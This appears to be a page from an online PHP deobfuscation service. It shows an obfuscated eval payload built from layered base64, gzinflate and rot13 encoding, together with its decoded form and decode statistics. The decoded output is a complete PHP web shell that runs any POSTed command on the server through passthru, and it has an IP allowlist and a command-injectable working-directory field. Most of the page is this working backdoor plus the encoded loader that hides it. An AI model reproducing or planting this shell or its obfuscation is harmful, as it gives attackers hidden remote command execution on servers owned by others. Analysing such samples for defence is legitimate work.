Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php eval(str_rot13(gzinflate(str_rot13(base64_decode('LUvHDuy6sfwaw/ftlAO8Rc45eHAo5zyKX2..

Decoded Output download

<?php
define("MAX_OUTPUT_LENGHT", 20000);
?><html>
<head>
<title>Shell - <?php echo (str_replace('<', '', $_POST['cmd'])); ?></title>
</head>
<body style="background-color: black; color: white; font-family: Consolas, Tahoma, Arial">
<pre style="background-color: black; color: white; font-family: Consolas, Tahoma, Arial">
<?php
if (!in_array(@$_SERVER['REMOTE_ADDR'], array('127.0.0.1', '::1', '190.244.46.99'))) {
    die('You are not allowed to access this file. Check ' . basename(__FILE__) . ' for more information.');
}
$unique = !empty($_POST['unique']) ? $_POST['unique'] : "bshelltmp_" . md5(rand(1000) . date("YmdHis"));
$tmp = is_writable(dirname(__FILE__)) ? dirname(__FILE__) : sys_get_temp_dir(); // on cloud servers we prefer the NFS than a different /tmp/ for every submit.
$tmppwd = $tmp . "/" . $unique . "_pwd.txt";
$tmpoutput = $tmp . "/" . $unique . "_output.txt";
$pwd = !empty($_POST['pwd']) ? $_POST['pwd'] : getcwd();
if (!empty($_POST['cmd'])) {
    $cmd = stripslashes($_POST['cmd']);
    passthru('cd ' . $pwd . ' && echo "<hr/>">> ' . $tmpoutput . ' && echo ' . $pwd . '$ ' . escapeshellarg($cmd) . ' >> ' . $tmpoutput . ' && echo >> ' . $tmpoutput . ' && ' . $cmd . ' >> ' . $tmpoutput . ' 2>&1 && pwd > ' . $tmppwd);
    $newpwd = trim(file_get_contents($tmppwd)); //capture new Present (current) Working Directory just in case it changed
    if ($newpwd != "") $pwd = $newpwd; //if something failed, don't change directory
    echo (file_get_contents($tmpoutput, false, NULL, filesize($tmpoutput) - MAX_OUTPUT_LENGHT));
    unlink($tmppwd);
}
?>
</pre>
<p>
<form method="post">
<a href="#" onclick="var a=document.getElementById('cmd');a.value=''; a.focus();document.location.href='#bottom';" style="background-color: black; color: gray;">Reset</a>
<input type="hidden" name="nocache" value="<?php echo md5(rand(1000) . date("YmdHis")); ?>">
<input type="hidden" name="unique" value="<?php echo $unique; ?>">
<input type="hidden" name="pwd" value="<?php echo $pwd; ?>">
<?php echo $pwd; ?>$
<input type="text" style="background-color: black; color: white; font-family: Consolas, Tahoma, Arial; border: none; padding: 0px; margin:0px; width: 80%; background-color: black; color: white;" name="cmd" id="cmd" value="<?php echo htmlentities(stripslashes($_POST['cmd'])) ?>">
<input type="submit" value="Run">
</form>
<br/>
<br/>
</p>
<script>
function keys(e) {
var code;
if (!e) var e = window.event;
if (e.keyCode) code = e.keyCode;
else if (e.which) code = e.which;
if(code == 27){
this.value='';
};
};
var cmd = document.getElementById('cmd');
cmd.focus()
if(cmd.attachEvent){
//IE
cmd.attachEvent('keypress',keys);
} else if(cmd.addEventListener) {
cmd.addEventListener('keypress',keys,false);
}
document.location.href="#bottom";
</script>
<a name="#bottom"></a>
</body>
</html>

Did this file decode correctly?

Original Code

<?php
eval(str_rot13(gzinflate(str_rot13(base64_decode('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')))));
?>

Function Calls

rawurldecode 1
base64_decode 18
strrev 3
gzuncompress 4
gzinflate 11
str_rot13 11

Variables

None

Stats

MD5 8b7d87e35914b565e2513f397e9919c4
Eval Count 16
Decode Time 273 ms